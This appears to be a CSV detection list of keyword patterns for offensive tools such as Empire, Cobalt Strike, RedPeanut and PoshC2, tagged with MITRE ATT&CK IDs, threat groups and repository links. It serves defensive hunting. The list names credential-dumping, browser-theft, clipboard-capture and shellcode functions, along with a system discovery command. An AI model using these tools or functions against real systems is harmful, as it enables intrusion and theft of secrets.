+"*Get-BloodHoundData*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SPN.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-BootKey*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-BrowserData.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1153","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-BrowserInformation*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*GetC2Server*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*Get-CachedGPPPassword*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-CachedRDPConnection*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" +"*Get-CachedRDPConnection*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*getcap -r / 2>*","greyware_tool_keyword","getcap","recursively scans all the files starting from the root directory / and lists files with capabilities set","T1082 - T1007","TA0007 - TA0009","N/A","N/A","discovery","N/A","1","0","N/A","6","8","N/A","N/A","N/A","N/A" +"*getcap -r / 2>/dev/null*","greyware_tool_keyword","Getcap","Enumerating File Capabilities with Getcap","T1046 - T1083","TA0007","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*Get-ChromeBookmarks*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-ChromeDump*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-ChromeDump*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1150","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-ChromeHistory*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*GetChromeSecrets*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*GETCLIPBOARD*GETLOCALGROUP*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*Get-ClipboardContents*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-ClipboardContents.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1070","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-CompressedAgent*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*Get-CompressedAgent.ps1*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*Get-CompressedShellcode*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*Get-CompressedShellcode.ps1*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*Get-ComputerDetails*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*GetComputersFromActiveDirectory*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*get-creditcarddata *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-CredPersist*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*getCrossC2Beacon*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" +"*getCrossC2Site*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - 